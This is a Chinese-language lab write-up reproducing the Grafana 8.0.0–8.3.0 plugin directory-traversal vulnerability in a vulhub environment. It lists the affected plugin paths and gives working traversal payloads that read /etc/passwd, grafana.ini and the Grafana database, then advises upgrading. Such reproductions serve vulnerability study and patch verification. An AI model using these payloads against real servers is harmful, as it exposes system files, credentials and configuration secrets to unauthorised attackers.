Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
未授权的攻击者利用该漏洞,能够获取服务器敏感文件
该漏洞是由于Grafana 插件引发的目录穿越漏洞导致任意文件读取,由于Grafana的读取文件接口存在未授权,且未对文件地址进行过滤,导致可以目录穿越实现系统任意文件读取
受影响版本:Grafana 8.0.0 - 8.3.0
漏洞复现
vulhub靶场环境
docker-compose up -d #开启容器
进入3000端口查看,进入grafana的登陆界面
使用burpsuit对这个页面进行抓包
这里我们需要用到里面的受影响的插件来构造POC
官方发布的受影响的插件名单
<grafana_host_url>/public/plugins/alertlist/
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
<grafana_host_url>/public/plugins/gauge/
<grafana_host_url>/public/plugins/geomap/
<grafana_host_url>/public/plugins/gettingstarted/
<grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
<grafana_host_url>/public/plugins/graph/
<grafana_host_url>/public/plugins/heatmap/
<grafana_host_url>/public/plugins/histogram/
<grafana_host_url>/public/plugins/influxdb/
<grafana_host_url>/public/plugins/jaeger/
<grafana_host_url>/public/plugins/logs/
<grafana_host_url>/public/plugins/loki/
<grafana_host_url>/public/plugins/mssql/
<grafana_host_url>/public/plugins/mysql/
<grafana_host_url>/public/plugins/news/
<grafana_host_url>/public/plugins/nodeGraph/
<grafana_host_url>/public/plugins/opentsdb
<grafana_host_url>/public/plugins/piechart/
<grafana_host_url>/public/plugins/pluginlist/
<grafana_host_url>/public/plugins/postgres/
<grafana_host_url>/public/plugins/prometheus/
<grafana_host_url>/public/plugins/stackdriver/
<grafana_host_url>/public/plugins/stat/
<grafana_host_url>/public/plugins/state-timeline/
<grafana_host_url>/public/plugins/status-history/
<grafana_host_url>/public/plugins/table/
<grafana_host_url>/public/plugins/table-old/
<grafana_host_url>/public/plugins/tempo/
<grafana_host_url>/public/plugins/testdata/
<grafana_host_url>/public/plugins/text/
<grafana_host_url>/public/plugins/timeseries/
<grafana_host_url>/public/plugins/welcome/
<grafana_host_url>/public/plugins/zipkin/
以下演示就使用gauge来进行,在抓到的数据包的GET后面添加payload进去
#读取passwd目录
/public/plugins/gauge/../../../../../../../../../etc/passwd
#读取Grafana配置文件
/public/plugins/gauge/../../../../../../../../../../../../../../../etc/grafana/grafana.ini
#读取grafana数据库
/public/plugins/gauge/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db
修复建议
处于受影响版本的应立即升级
-----------------------------------------------------------------------------------------------------------------------------